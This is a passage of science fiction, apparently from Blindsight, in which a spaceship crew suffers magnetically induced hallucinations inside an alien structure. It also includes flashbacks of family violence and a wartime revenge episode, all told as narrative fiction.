+μ-Opioid Receptor Promoters / Maternal Response Stimulant
+"Strengthening ties between Mother and Child since 2042"
+
+"Yeah? And how are you going to stop me, you little geek? You can't even make the time to find out what's going on in your own family; you think you can control me all the way from fucking orbit? You think—"
+Suddenly, nothing came from the living room but soft choking sounds. I peeked around the corner.
+My father had Helen by the throat.
+"I think," he growled, "that I can stop you from doing anything to Siri ever again, if I have to. And I think you know that."
+And then she saw me. And then he did. And my father took his hand from around my mother's neck, and his face was utterly unreadable.
+But there was no mistaking the triumph on hers.
+
+*
+
+I was up off the couch, the skullcap clenched in one hand. Chelsea stood wide-eyed before me, the butterfly still as death on her cheekbone.
+She took my hand. "Oh, God. I'm so sorry."
+"You—you saw that?"
+"No, of course not. It can't read minds. But that obviously— wasn't a happy memory."
+"It wasn't all that bad."
+I felt sharp, disembodied pain from somewhere nearby, like an ink spot on a white tablecloth. After a moment I fixed it: teeth in my lip.
+She ran her hand up my arm. "It really stressed you out. Your vitals were—are you okay?"
+"Yeah, of course. No big deal." Tasting salt. "I am curious about something, though."
+"Ask me."
+"Why would you do this to me?"
+"Because we can make it go away, Cygnus. That's the whole point. Whatever that was, whatever you didn't like about it, we know where it is now. We can go back in and damp it out just like that. And then we've got days to get it removed permanently, if that's what you want. Just put the cap back on and—"
+She put her arms around me, drew me close. She smelled like sand, and sweat. I loved the way she smelled. For a while, I could feel a little bit safe. For a while I could feel like the bottom wasn't going to drop out at any moment. Somehow, when I was with Chelsea, I mattered.
+I wanted her to hold me forever.
+"I don't think so," I said.
+"No?" She blinked, looked up at me. "Why ever not?"
+I shrugged. "You know what they say about people who don't remember the past."
+"Predators run for their dinner. Prey run for their lives."
+—Old Ecologist's Proverb
+
+We were blind and helpless, jammed into a fragile bubble behind enemy lines. But finally the whisperers were silent. The monsters had stayed beyond the covers.
+And Amanda Bates was out there with them.
+"What the fuck," Szpindel breathed.
+The eyes behind his faceplate were active and searching. "You can see?" I asked.
+He nodded. "What happened to Bates? Her suit breach?"
+"I don't think so."
+"Then why'd she say she was dead? What—"
+"She meant it literally," I told him. "Not I'm as good as dead or I'm going to die. She meant dead now. Like she was a talking corpse."
+"How do—" you know? Stupid question. His face ticced and trembled in the helmet. "That's crazy, eh?"
+"Define crazy."
+The Gang floated quietly, cheek-to-jowl behind Szpindel in the cramped enclosure. Cruncher had stopped obsessing about the leg as soon as we'd sealed up. Or maybe he'd simply been overridden; I thought I saw facets of Susan in the twitching of those thick gloved fingers.
+Szpindel's breath echoed second-hand over the link. "If Bates is dead, then so are we."
+"Maybe not. We wait out the spike, we get out of here. Besides," I added, "she wasn't dead. She only said she was."
+"Fuck," Szpindel reached out and pressed his gloved palm against the skin of the tent. He felt back and forth along the fabric. "Someone did put out a transducer—"
+"Eight o'clock," I said. "About a meter." Szpindel's hand came to rest across the wall from the pod. My HUD flooded with second-hand numbers, vibrated down his arm and relayed to our suits.
+Still five Tesla out there. Falling, though. The tent expanded around us as if breathing, shrank back in the next second as some transient low-pressure front moved past.
+"When did your sight come back?" I wondered.
+"Soon as we came inside."
+"Sooner. You saw the battery."
+"Fumbled it." He grunted. "Not that I'm much less of a spaz even when I'm not blind, eh? Bates! You out there?"
+"You reached for it. You almost caught it. That wasn't blind chance."
+"Not blind chance. Blindsight. Amanda? Respond, please."
+"Blindsight?"
+"Nothing wrong with the receptors," he said distractedly. "Brain processes the image but it can't access it. Brain stem takes over."
+"Your brainstem can see but you can't?"
+"Something like that. Shut up and let me—Amanda, can you hear me?"
+"...No..."
+Not from anyone in the tent, that voice. It had shivered down Szpindel's arm, barely audible, with the rest of the data. From outside.
+"Major Mandy!" Szpindel exclaimed. "You're alive!"
+"....no..." A whisper like white noise.
+"Well you're talking to us, so you sure as shit ain't dead."
+"No..."
+Szpindel and I exchanged looks. "What's the problem, Major?"
+Silence. The Gang bumped gently against the wall behind us, all facets opaque.
+"Major Bates? Can you hear me?"
+"No." It was a dead voice— sedated, trapped in a fishbowl, transmitted through limbs and lead at a three-digit baud rate. But it was definitely Bates' voice.
+"Major, you've got to get in here," Szpindel said. "Can you come inside?"
+"...No...".
+"Are you injured? Are you pinned by something?"
+"..N—no."
+Maybe not her voice, after all. Maybe just her vocal cords.
+"Look. Amanda, it's dangerous. It's too damn hot out there, do you understand? You—"
+"I'm not out here," said the voice.
+"Where are you?"
+"...nowhere."
+I looked at Szpindel. Szpindel looked at me. Neither of us spoke.
+James did. At long last, and softly: "And what are you, Amanda?"
+No answer.
+"Are you Rorschach?"
+Here in the belly of the beast, it was so easy to believe.
+"No..."
+"Then what?"
+"N...nothing." The voice was flat and mechanical. "I'm nothing."
+"You're saying you don't exist?" Szpindel said slowly.
+"Yes."
+The tent breathed around us.
+"Then how can you speak?" Susan asked the voice. "If you don't exist, what are we talking to?"
+"Something...else." A sigh. A breath of static. "Not me."
+"Shit," Szpindel muttered. His surfaces brightened with resolve and sudden insight. He pulled his hand from the wall; my HUD thinned instantly. "Her brain's frying. We gotta get her inside." He reached for the release.
+I put out my own hand. "The spike—"
+"Crested already, commissar. We're past the worst of it."
+"Are you saying it's safe?"
+"It's lethal. It's always lethal, and she's out there in it, and she could do some serious damage to herself in her pres—"
+Something bumped the tent from the outside. Something grabbed the outer catch and pulled.
+Our shelter opened like an eye. Amanda Bates looked in at us through the exposed membrane. "I'm reading three point eight," she said. "That's tolerable, right?"
+Nobody moved.
+"Come on, people. Break's over."
+"Ama—" Szpindel stared. "Are you okay?"
+"In here? Not likely. But we've got a job to do."
+"Do you—exist?" I asked.
+"What kind of stupid question is that? Szpindel, how's this field strength? Can we work in it?"
+"Uh..." He swallowed audibly. "Maybe we should abort, Major. That spike was—"
+"According to my readings, the spike is pretty much over. And we've got less than two hours to finish setting up, run our ground truths, and get out of here. Can we do that without hallucinating?"
+"I don't think we'll shake the heebie-jeebies," Szpindel admitted. "But we shouldn't have to worry about —extreme effects— until another spike hits."
+"Good."
+"Which could be any time."
+"We weren't hallucinating," James said quietly.
+"We can discuss it later," Bates said. "Now—"
+"There was a pattern there," James insisted. "In the fields. In my head. Rorschach was talking. Maybe not to us, but it was talking."
+"Good." Bates pushed herself back to let us pass. "Maybe now we can finally learn to talk back."
+"Maybe we can learn to listen," James said.
+
+*
+
+We fled like frightened children with brave faces. We left a base camp behind: Jack, still miraculously functional in its vestibule; a tunnel into the haunted mansion; forlorn magnetometers left to die in the faint hope they might not. Crude pyronometers and thermographs, antique radiation-proof devices that measured the world through the flex and stretch of metal tabs and etched their findings on rolls of plastic. Glow-globes and diving bells and guide ropes strung one to another. We left it all behind, and promised to return in thirty-six hours if we lived so long.
+Inside each of us, infinitesimal lacerations were turning our cells to mush. Plasma membranes sprang countless leaks. Overwhelmed repair enzymes clung desperately to shredded genes and barely delayed the inevitable. Anxious to avoid the rush, patches of my intestinal lining began flaking away before the rest of the body had a chance to die.
+By the time we docked with Theseus both Michelle and I were feeling nauseous. (The rest of the Gang, oddly, was not; I had no idea how that was possible.) The others would be presenting the same symptoms within minutes. Without intervention we would all be vomiting our guts out for the following two days. Then the body would pretend to recover; for perhaps a week we would feel no pain and have no future. We would walk and talk and move like any living thing, and perhaps convince ourselves that we were immortal after all.
+Then we would collapse into ourselves, rotted from the inside out. We would bleed from our eyes and mouths and assholes, and if any God was merciful we would die before splitting open like rotten fruit.
+But of course Theseus, our redeemer, would save us from such a fate. We filed from the shuttle into a great balloon that Sarasti had erected to capture our personal effects; we shed our contaminated space suits and clothing and emerged naked into the spine. We passed single-file through the drum, the Flying Dead in formation. Jukka Sarasti—discreetly distant on the turning floor—leapt up in our wake and disappeared aft, to feed our radioactive cast-offs into the decompiler.
+Into the crypt. Our coffins lay open across the rear bulkhead. We sank gratefully and wordlessly into their embrace. Bates coughed blood as the lids came down.
+My bones hummed as the Captain began to shut me off. I went to sleep a dead man. I had only theory and the assurances of fellow machinery that I would ever be born again.
+
+*
+
+Keeton, come forth.
+I woke up ravenous. Faint voices drifted forward from the drum. I floated in my pod for a few moments, eyes closed, savoring absences: no pain, no nausea. No terrifying subliminal sense of one's own body sloughing incrementally to mush. Weakness, and hunger; otherwise I felt fine.
+I opened my eyes.
+Something like an arm. Grey and glistening, far too— too attenuate to be human. No hand at its tip. Too many joints, a limb broken in a dozen places. It extended from a body barely visible over the lip of the pod, a suggestion of dark bulk and other limbs in disjoint motion. It hovered motionless before me, as if startled in the midst of some shameful act.
+By the time I had breath enough to cry out, it had whipped back out of sight.
+I erupted from the pod, eyes everywhere. Now they saw nothing: an empty crypt, a naked note-taker. The mirrored bulkhead reflected vacant pods to either side. I called up ConSensus: all systems nominal.
+It didn't reflect, I remembered. The mirror didn't show it.
+I headed aft, heart still pounding. The drum opened around me, Szpindel and the Gang conversing in low tones aft. Szpindel glanced up and waved a trembling hand in greeting.
+"You need to check me out," I called. My voice wasn't nearly so steady as I'd hoped.
+"Admitting you have a problem is the first step," Szpindel called back. "Just don't expect miracles." He turned back to the Gang; James on top, they sat in a diagnostic couch staring at some test pattern shimmering on the rear bulkhead.
+I grabbed the tip of a stairway and pulled myself down. Coriolis pushed me sideways like a flag in the breeze. "I'm either hallucinating or there's something on board."
+"You're hallucinating."
+"I'm serious."
+"So am I. Take a number. Wait your turn."
+He was serious. Once I forced myself to calm down and read the signs, I could see he wasn't even surprised.
+"Guess you're pretty hungry after all that exhausting lying around, eh?" Szpindel waved at the galley. "Eat something. Be with you in a few minutes."
+I forced myself to work up my latest synopsis while I ate, but that only took half a mind; the other still shivered in residual thrall to fight-flight. I tried to distract it by tapping the BioMed feed.
+"It was real," James was saying. "We all saw it."
+No. Couldn't have been.
+Szpindel cleared his throat. "Try this one."
+The feed showed what she saw: a small black triangle on a white background. In the next instant it shattered into a dozen identical copies, and a dozen dozen. The proliferating brood rotated around the center screen, geometric primitives ballroom-dancing in precise formation, each sprouting smaller triangles from its tips, fractalizing, rotating, evolving into an infinite, intricate tilework...
+A sketchpad, I realized. An interactive eyewitness reconstruction, without the verbiage. Susan's own pattern-matching wetware reacted to what she saw— no, there were more of them; no, the orientation's wrong; yes, that's it, but bigger— and Szpindel's machine picked those reactions right out of her head and amended the display in realtime. It was a big step up from that half-assed workaround called language. The easily-impressed might have even called it mind-reading.
+It wasn't, though. It was all just feedback and correlation. It doesn't take a telepath to turn one set of patterns into another. Fortunately.
+"That's it! That's it!" Susan cried.
+The triangles had iterated out of existence. Now the display was full of interlocking asymmetrical pentagrams, a spiderweb of fish scales.
+"Don't tell us that's random noise," she said triumphantly.
+"No," Szpindel said, "It's a Klüver constant."
+"A—"
+"It's a hallucination, Suze."
+"Of course. But something planted it in our head, right? And—"
+"It was in your head all along. It was in your head the day you were born."
+"No."
+"It's an artefact of deep brain structure. Even congenitally blind people see them sometimes."
+"None of us have seen them before. Ever."
+"I believe you. But there's no information there, eh? That wasn't Rorschach talking, it was just—interference. Like everything else."
+"But it was so vivid! Not that flickering corner-of-your-eye stuff we saw everywhere. This was solid. It was realer than real."
+"That's how you can tell it wasn't. Since you don't actually see it, there's no messy eyeball optics to limit resolution."
+"Oh," James said, and then, softly: "Shit."
+"Yeah. Sorry." And then, "Any time you're ready."
+I looked up; Szpindel was waving me over. James rose from her chair, but it was Michelle who gave him a quick disconsolate squeeze and Sascha who grumbled past me on her way to their tent.
+By the time I reached him Szpindel had unfolded the couch into a half-cot. "Lie down."
+I did. "I wasn't talking about back in Rorschach, you know. I meant here. I saw something right now. When I woke up."
+"Raise your left hand," he said. Then: "Just your left, eh?"
+I lowered my right, winced at the pinprick. "That's a bit primitive."
+He eyed the blood-filled cuvette between his thumb and forefinger: a shivering ruby teardrop the size of a fingernail. "Wet sample's still best for some things."
+"Aren't the pods supposed to do everything?"
+Szpindel nodded. "Call it a quality-control test. Keep the ship on its toes." He dropped the sample onto the nearest countertop. The teardrop flattened and burst; the surface drank my blood as if parched. Szpindel smacked his lips. "Elevated cholinesterase inhibitors in the ret. Yum."
+For all I knew, my blood results actually did taste good to the man. Szpindel didn't just read results; he felt them, smelled and saw and experienced each datum like drops of citrus on the tongue. The whole BioMed subdrum was but a part of the Szpindel prosthesis: an extended body with dozens of different sensory modes, forced to talk to a brain that knew only five.
+No wonder he'd bonded with Michelle. He was almost synesthesiac himself.
+"You spent a bit longer in there than the rest of us," he remarked.
+"That's significant?"
+A jerking shrug. "Maybe your organs got a bit more cooked than ours. Maybe you just got a delicate constitution. Your pod would've caught anything—imminent, so I figure—ah."
+"What?"
+"Some cells along your brainpan going into overdrive. More in your bladder and kidney."
+"Tumors?"
+"What you expect? Rorschach's no rejuve spa."
+"But the pod—"
+Szpindel grimaced; his idea of a reassuring smile. "Repairs ninety-nine point nine percent of the damage, sure. By the time you get to the last zero-point-one, you're into diminishing returns. These're small, commissar. Chances are your own body'll take care of 'em. If not, we know where they live."
+"The ones in my brain. Could they be causing—"
+"Not a chance." He chewed on his lower lip for a moment. "Course, cancer's not all that thing did to us."
+"What I saw. Up in the crypt. It had these multijointed arms from a central mass. Big as a person, maybe."
+Szpindel nodded. "Get used to it."
+"The others are seeing these things?"
+"I doubt it. Everyone has a different take, like—" his twitching face conveyed Dare I say it? "—Rorschach blots."
+"I was expecting hallucinations in the field," I admitted, "but up here?"
+"TMS effects—" Szpindel snapped his fingers— "they're sticky, eh? Neurons get kicked into one state, take a while to come unstuck. You never got a TAT? Well-adjusted boy like you?"
+"Once or twice," I said. "Maybe."
+"Same principle."
+"So I'm going to keep seeing this stuff."
+"Party line is they fade over time. Week or two you're back to normal. But out here, with that thing..." He shrugged. "Too many variables. Not the least of which is, I assume we'll keep going back until Sarasti says otherwise."
+"But they're basically magnetic effects."
+"Probably. Although I'm not betting on anything where that fucker's concerned."
+"Could something else be causing them?" I asked. "Something on this ship?"
+"Like what?'
+"I don't know. Leakage in Theseus' magnetic shielding, maybe."
+"Not normally. Course, we've all got little implanted networks in our heads, eh? And you've got a whole hemisphere of prosthetics up there, who knows what kind of side-effects those might let you in for. Why? Rorschach not a good enough reason for you?"
+I saw them before, I might have said.
+And then Szpindel would say Oh, when? Where?
+And maybe I'd reply When I was spying on your private life, and any chance of noninvasive observation would be flushed down to the atoms.
+"It's probably nothing. I've just been—jumpy lately. Thought I saw something weird in the spinal bundle, back before we landed on Rorschach. Just for a second, you know, and it disappeared as soon as I focused on it."
+"Multijointed arms with a central mass?"
+"God no. Just a flicker, really. If it was anything at all, it was probably just Amanda's rubber ball floating around up there."
+"Probably." Szpindel seemed almost amused. "Couldn't hurt to check for leakage in the shielding, though. Just in case. Not like we need something else making us see things, eh?"
+I shook my head at remembered nightmares. "How are the others?"
+"Gang's fine, if a bit disappointed. Haven't seen the Major." He shrugged. "Maybe she's avoiding me."
+"It hit her pretty hard."
+"No worse than the rest of us, really. She might not even remember it."
+"How—how could she possibly believe she didn't even exist?"
+Szpindel shook his head. "Didn't believe it. Knew it. For a fact."
+"But how—"
+"Charge gauge on your car, right? Sometimes the contacts corrode. Readout freezes on empty, so you think it's empty. What else you supposed to think? Not like you can go in and count the electrons."
+"You're saying the brain's got some kind of existence gauge?"
+"Brain's got all kinds of gauges. You can know you're blind even when you're not; you can know you can see, even when you're blind. And yeah, you can know you don't exist even when you do. It's a long list, commissar. Cotard's, Anton's, Damascus Disease. Just for starters."
+He hadn't said blindsight.
+"What was it like?" I asked.
+"Like?" Although he knew exactly what I meant.
+"Did your arm— move by itself? When it reached for that battery?"
+"Oh. Nah. You're still in control, you just—you get a feeling, is all. A sense of where to reach. One part of the brain playing charades with another, eh?" He gestured at the couch. "Get off. Seen enough of your ugly guts for now. And send up Bates if you can find where she's hiding. Probably back at Fab building a bigger army."
+The misgivings glinted off him like sunlight. "You have a problem with her," I said.
+He started to deny it, then remembered who he was talking to. "Not personally. Just—human node running mechanical infantry. Electronic reflexes slaved to meat reflexes. You tell me where the weak spot is."
+"Down in Rorschach, I'd have to say all the links are pretty weak."
+"Not talking about Rorschach," Szpindel said. "We go there. What stops them from coming here?"
+"Them."
+"Maybe they haven't arrived yet," he admitted. "But when they do, I'm betting we'll be going up against something bigger than anaerobic microbes." When I didn't answer he continued, his voice lowered. "And anyway, Mission Control didn't know shit about Rorschach. They thought they were sending us some place where drones could do all the heavy lifting. But they just hate not being in command, eh? Can't admit the grunts're smarter than the generals. So our defenses get compromised for political appearances—not like that's any kinda news—and I'm no jarhead but it strikes me as real bad strategy."
+I remembered Amanda Bates, midwifing the birth of her troops. I'm more of a safety precaution....
+"Amanda—" I began.
+"Like Mandy fine. Nice mammal. But if we're cruising into a combat situation I don't want my ass covered by some network held back by its weakest link."
+"If you're going to be surrounded by a swarm of killer robots, maybe—"
+"Yeah, people keep saying that. Can't trust the machines. Luddites love to go on about computer malfunctions, and how many accidental wars we might have prevented because a human had the final say. But funny thing, commissar; nobody talks about how many intentional wars got started for the same reason. You're still writing those postcards to posterity?"
+I nodded, and didn't wince inwardly. It was just Szpindel.
+"Well, feel free to stick this conversation in your next one. For all the good it'll do."
+
+*
+
+Imagine you are a prisoner of war.
+You've got to admit you saw it coming. You've been crashing tech and seeding biosols for a solid eighteen months; that's a good run by anyone's standards. Realist saboteurs do not, as a rule, enjoy long careers. Everyone gets caught eventually.
+It wasn't always thus. There was a day you might have even hoped for a peaceful retirement. But then they brought the vampires back from the Pleistocene and Great Grieving Ganga did that ever turn the balance of power upside down. Those fuckers are always ten steps ahead. It only makes sense; after all, hunting people is what bloodsuckers evolved to do.
+There's this line from an early pop-dyn textbook, really old, maybe even TwenCen. It's something of a mantra—maybe prayer would be a better word—among those in your profession. Predators run for their dinner, it goes. Prey run for their lives. The moral is supposed to be that on average, the hunted escape the hunters because they're more motivated.
+Maybe that was true when it all just came down to who ran faster. Doesn't seem to hold when the strategy involves tactical foresight and double-reverse mind fucks, though. The vampires win every time.
+And now you're caught, and while it may have been vampires that set the trap, it was regular turncoat baseline humans who pulled the trigger. For six hours now you've been geckoed to the wall of some unnamed unlisted underground detention facility, watching as some of those selfsame humans played games with your boyfriend and co-conspirator. These are not your average games. They involve pliers, and glowing wires, and body parts that were not designed to detach. You wish, by now, that your lover were dead, like the two others in your cell whose parts are scattered about the room. But they're not letting that happen. They're having too much fun.
+That's what it all comes down to. This is not an interrogation; there are less invasive ways to get more reliable answers. These are simply a few more sadistic thugs with Authority, killing time and other things, and you can only cry and squeeze your eyes tight and whimper like an animal even though they haven't laid a hand on you yet. You can only wish they hadn't saved you for last, because you know what that means.
+But suddenly your tormentors stop in mid-game and cock their heads as if listening to some collective inner voice. Presumably it tells them to take you off the wall, bring you into the next room, and sit you down at one of two gel-padded chairs on opposite sides of a smart desk, because this is what they do—far more gently than you'd expect—before retiring. You can also assume that whoever has given these instructions is both powerful and displeased, because all the arrogant sadistic cockiness has drained from their faces in the space of a heartbeat.
+You sit and wait. The table glows with soft, cryptic symbols that would be of no earthly interest to you even if you could understand them, even if they contained the very secret of the vampires themselves. Some small part of you wonders if this latest development might be cause for hope; the rest of you doesn't dare believe it. You hate yourself for caring about your own survival when chunks of your friends and allies are still warm on the other side of the wall.
+A stocky Amerind woman appears in the room with you, clad in nondescript military weave. Her hair is buzzed short, her throat veined with the faint mesh of a sub-q antennae. Your brain stem sees that she is ten meters tall, even though some impertinent gelatinous overlay insists that she is of only average height.
+The name tag on her left breast says Bates. You see no sign of rank.
+Bates extracts a weapon from its sheath on her thigh. You flinch, but she does not point it at you. She sets it on the desk, easily within your reach, and sits across from you.
+A microwave pistol. Fully charged, unlocked. On its lowest setting it causes sunburn and nausea. On its highest it flash-boils brains in the skull. At any setting between, it inflicts pain and injury in increments as fine as your imagination.
+Your imagination has been retooled for great sensitivity along such scales. You stare numbly at the gun, trying to figure the trick.
+"Two of your friends are dead," Bates says, as though you haven't just watched them die. "Irrecoverably so."
+Irrecoverably dead. Good one.
+"We could reconstitute the bodies, but the brain damage..." Bates clears her throat as if uncomfortable, as if embarrassed. It's a surprisingly human gesture for a monster. "We're trying to save the other one. No promises.
+"We need information," she says, cutting to the chase.
+Of course. What came before was psychology, softening-up. Bates is the good cop.
+"I've got nothing to tell you," you manage. It's ten percent defiance, ninety percent deduction: they wouldn't have been able to catch you in the first place unless they already knew everything.
+"Then we need an arrangement," Bates says. "We need to come to some kind of accommodation."
+She has to be kidding.
+Your incredulity must be showing. Bates addresses it: "I'm not completely unsympathetic. My gut doesn't much like the idea of swapping reality for simulation, and it doesn't buy that what-is-truth spin the Body Economic sells to get around it. Maybe there's reason to be scared. Not my problem, not my job, just my opinion and it could be wrong. But if we kill each other in the meantime, we don't find out either way. It's unproductive."
+You see the dismembered bodies of your friends. You see pieces on the floor, still a little bit alive, and this cunt has the nerve to talk about productivity?
+"We didn't start it," you say.
+"I don't know and I don't care. Like I said, it's not my job." Bates jerks a thumb over her shoulder at a door in the wall behind her, the door she must have entered through. "In there," she says, "are the ones who killed your friends. They've been disarmed. When you go through that door the room will go offline and remain unmonitored for a period of sixty seconds. Nobody besides yourself will ever hold you accountable for whatever happens in there during that time."
+It's a trick. It has to be.
+"What do you have to lose?" Bates wonders. "We can already do anything we want to you. It's not like we need you to give us an excuse."
+Hesitantly, you take the gun. Bates doesn't stop you.
+She's right, you realize. You have absolutely nothing to lose. You stand and, suddenly fearless, point the weapon at her face. "Why go in there? I can kill you right here."
+She shrugs. "You could try. Waste of an opportunity, if you ask me."
+"So I go in there, and I come out in sixty seconds, and then what?"
+"Then we talk."
+"We just—"
+"Think of it as a gesture of good faith," she says. "Restitution, even."
+The door opens at your approach, closes in your wake. And there they are, all four of them, spread up across the wall like a chorus line of Christs on crosses. There's no gleam in those eyes now. There's only a bright animal terror and the reflection of turned tables. Two of the Christs stain their pants when you look them in the eye.
+What's left? Maybe fifty seconds?
+It's not a lot. You could have done so much more with just a little extra time. But it's enough, and you don't want to impose on the good graces of this Bates woman.
+Because she may at last be someone you can deal with.
+
+*
+
+Under other circumstances, Lieutenant Amanda Bates would have been court-martialed and executed within the month. No matter that the four who'd died had been guilty of multiple counts of rape, torture, and homicide; that's just what people did in wartime. It's what they'd always done. There was nothing polite about war, no honorable code beyond the chain of command and the circling of wagons. Deal with indiscretions if you must; punish the guilty if you have to, for appearance if nothing else. But for God's sake close the doors first. Never give your enemy the satisfaction of seeing discord in the ranks, show them nothing but unity and flinty-eyed resolve. There may be murderers and rapists in our midst, but by God they're our murderers and rapists.
+You certainly don't give right of revenge to some terrorist twat with over a hundred friendly scalps on her belt.
+Still, it was hard to argue with results: a negotiated ceasefire with the third-largest Realist franchise in the hemisphere. An immediate forty-six percent decline in terrorist activities throughout the affected territories. The unconditional cancellation of several in-progress campaigns which could have seriously compromised three major catacombs and taken out the Duluth Staging Grounds entirely. All because Lieutenant Amanda Bates, feeling her way through her first field command, had gambled on empathy as a military strategy.
+It was collaborating with the enemy, it was treason, it was betrayal of the rank and file. Diplomats and politicians were supposed to do those things, not soldiers.
+Still. Results.
+It was all there in the record: initiative, creativity, a willingness to succeed by whatever means necessary and at whatever cost. Perhaps those inclinations needed to be punished, perhaps only tempered. The debate might have gone on forever if the story hadn't leaked—but it had, and suddenly the generals had a hero on their hands.
+Sometime during her court-martial, Bates's death sentence turned into a rehabilitation; the only question was whether it would take place in the stockade or Officer's College. As it turned out, Leavenworth had both; it took her to its bosom and squeezed hard enough to virtually guarantee promotion, if it didn't kill her first. Three years later Major Bates was bound for the stars, where she was heard to say
+We're breaking and entering, Siri...
+Szpindel was not the first to register doubts. Others had wondered whether her assignment owed as much to superior qualifications as it did to the resolution of inconvenient PR. I, of course, had no opinion one way or the other; but I could see how she might strike some as a double-edged sword.
+When the fate of the world hangs in the balance, you want to keep an eye on anyone whose career-defining moment involves consorting with the enemy.
+"If you can see it, chances are it doesn't exist."
+—Kate Keogh, Grounds for Suicide
+
+Five times we did it. Over five consecutive orbits we threw ourselves between the monster's jaws, let it chew at us with a trillion microscopic teeth until Theseus reeled us in and stitched us back together. We crept through Rorschach's belly in fits and starts, focusing as best we could on the tasks at hand, trying to ignore the ghosts that tickled our midbrains. Sometimes the walls flexed subtly around us. Sometimes we only thought they did. Sometimes we took refuge in our diving bell while waves of charge and magnetism spiraled languidly past, like boluses of ectoplasm coursing down the intestine of some poltergeist god.
+Sometimes we got caught in the open. The Gang would squabble amongst itself, uncertain which persona was which. Once I fell into a kind of waking paralysis while alien hands dragged me away down the hall; fortunately other hands brought me home, and voices that claimed to be real told me I'd made the whole thing up. Twice Amanda Bates found God, saw the fucker right there in front of her, knew beyond any shadow of a doubt that the creator not only existed but spoke to her, and her alone. Both times she lost her faith once we got her into the bell, but it was touch and go for a while; her warrior drones, drunk on power but still under line-of-sight control, staggered from their perimeters and pointed their weapons along bearings too close for comfort.
+The grunts died fast. Some barely lasted a single foray; a few died in minutes. The longest-lived were the slowest on the draw, half-blind, thick-witted, every command and response bottlenecked by raw high-frequency sound buzzing across their shielded eardrums. Sometimes we backed them up with others that spoke optically: faster but nervous, and even more vulnerable. Together they guarded against an opposition that had not yet shown its face.
+It hardly had to. Our troops fell even in the absence of enemy fire.
+We worked through it all, through fits and hallucinations and occasional convulsions. We tried to watch each others' backs while magnetic tendrils tugged our inner ears and made us seasick. Sometimes we vomited into our helmets; then we'd just hang on, white-faced, sucking sour air through clenched teeth while the recyclers filtered chunks and blobs from our headspace. And we'd give silent thanks for the small mercy of nonstick, static-repellent faceplates.
+It rapidly became obvious that my presence served as more than cannon fodder. It didn't matter that I lacked the Gang's linguistic skills or Szpindel's expertise in biology; I was another set of hands, in a place where anyone could be laid out at a moment's notice. The more people Sarasti kept in the field, the greater the odds that at least one of them would be halfway functional at any given moment. Even so, we were in barely any condition to accomplish anything. Every incursion was an exercise in reckless endangerment.
+We did it anyway. It was that or go home.
+The work proceeded in infinitesimal increments, hamstrung on every front. The Gang wasn't finding any evidence of signage or speech to decipher, but the gross mechanics of this thing were easy enough to observe. Sometimes Rorschach partitioned itself, extruded ridges around its passageways like the cartilaginous hoops encircling a human trachea. Over hours some of them might develop into contracting irises, into complete septa, lazy as warm candle wax. We seemed to be witnessing the growth of the structure in discrete segments. Rorschach grew mainly from the tips of its thorns; we'd made our incursion hundreds of meters from the nearest, but evidently the process extended at least this far back.
+If it was part of the normal growth process, though, it was a feeble echo of what must have been going on in the heart of the apical zones. We couldn't observe those directly, not from inside; barely a hundred meters towards the thorn the tube grew too lethal even for suicidal flesh. But over those five orbits Rorschach grew by another eight percent, as mindless and mechanical as a growing crystal.
+Through it all I tried to do my job. I compiled and collated, massaged data I would never understand. I watched the systems around me as best I could, factored each tic and trait into the mix. One part of my mind produced synopses and syntheses while another watched, incredulous and uncomprehending. Neither part could trace where those insights had come from.
+It was difficult, though. Sarasti wouldn't let me back outside the system. Every observation was contaminated by my own confounding presence in the mix. I did my best. I made no suggestions that might affect critical decisions. In the field I did what I was told to, and no more. I tried to be like one of Bates's drones, a simple tool with no initiative and no influence on the group dynamic. I think I pulled it off, for the most part.
+My nonsights accumulated on schedule and piled up in Theseus's transmission stack, unsent. There was too much local interference to get a signal through to Earth.
+
+*
+
+Szpindel was right: the ghosts followed us back. We began to hear voices other than Sarasti's, whispering up the spine. Sometimes even the brightly-lit wraparound world of the drum would warp and jiggle from the corner of my eye—and more than once I saw boney headless phantoms with too many arms, nested in the scaffolding. They seemed solid enough from the corner of my eye but any spot I focused on faded to shadow, to a dark translucent stain against the background. They were so very fragile, these ghosts. The mere act of observation drilled holes through them.
+Szpindel had rattled off dementias like raindrops. I went to ConSensus for enlightenment and found a whole other self buried below the limbic system, below the hindbrain, below even the cerebellum. It lived in the brain stem and it was older than the vertebrates themselves. It was self-contained: it heard and saw and felt, independent of all those other parts layered overtop like evolutionary afterthoughts. It dwelt on nothing but its own survival. It had no time for planning or abstract analysis, spared effort for only the most rudimentary sensory processing. But it was fast, and it was dedicated, and it could react to threats in a fraction of the time it took its smarter roommates to even become aware of them.
+And even when it couldn't—when the obstinate, unyielding neocortex refused to let it off the leash—still it tried to pass on what it saw, and Isaac Szpindel experienced an ineffable sense of where to reach. In a way, he had a stripped-down version of the Gang in his head. Everyone did.
+I looked further and found God Itself in the meat of the brain, found the static that had sent Bates into rapture and Michelle into convulsions. I tracked Gray Syndrome to its headwaters in the temporal lobe. I heard voices ranting in the brains of schizophrenics. I found cortical infarcts that inspired people to reject their own limbs, imagined the magnetic fields that must have acted in their stead when Cruncher tried to dismember himself. And off in some half-forgotten pesthole of Twentieth-century case studies—filed under Cotard's Syndrome—I found Amanda Bates and others of her kind, their brains torqued into denial of the very self. "I used to have a heart," one of them said listlessly from the archives. "Now I have something that beats in its place." Another demanded to be buried, because his corpse was already stinking.
+There was more, a whole catalog of finely-tuned dysfunctions that Rorschach had not yet inflicted on us. Somnambulism. Agnosias. Hemineglect. ConSensus served up a freak show to make any mind reel at its own fragility: a woman dying of thirst within easy reach of water, not because she couldn't see the faucet but because she couldn't recognize it. A man for whom the left side of the universe did not exist, who could neither perceive nor conceive of the left side of his body, of a room, of a line of text. A man for whom the very concept of leftness had become literally unthinkable.
+Sometimes we could conceive of things and still not see them, although they stood right before us. Skyscrapers appeared out of thin air, the person talking to us changed into someone else during a momentary distraction— and we didn't notice. It wasn't magic. It was barely even misdirection. They called it inattentional blindness, and it had been well-known for a century or more: a tendency for the eye to simply not notice things that evolutionary experience classed as unlikely.
+I found the opposite of Szpindel's blindsight, a malady not in which the sighted believe they are blind but one in which the blind insist they can see. The very idea was absurd unto insanity and yet there they were, retinas detached, optic nerves burned away, any possibility of vision denied by the laws of physics: bumping into walls, tripping over furniture, inventing endless ludicrous explanations for their clumsiness. The lights, unexpectedly turned off by some other party. A colorful bird glimpsed through the window, distracting attention from the obstacle ahead. I can see perfectly well, thank you. Nothing wrong with my eyes.
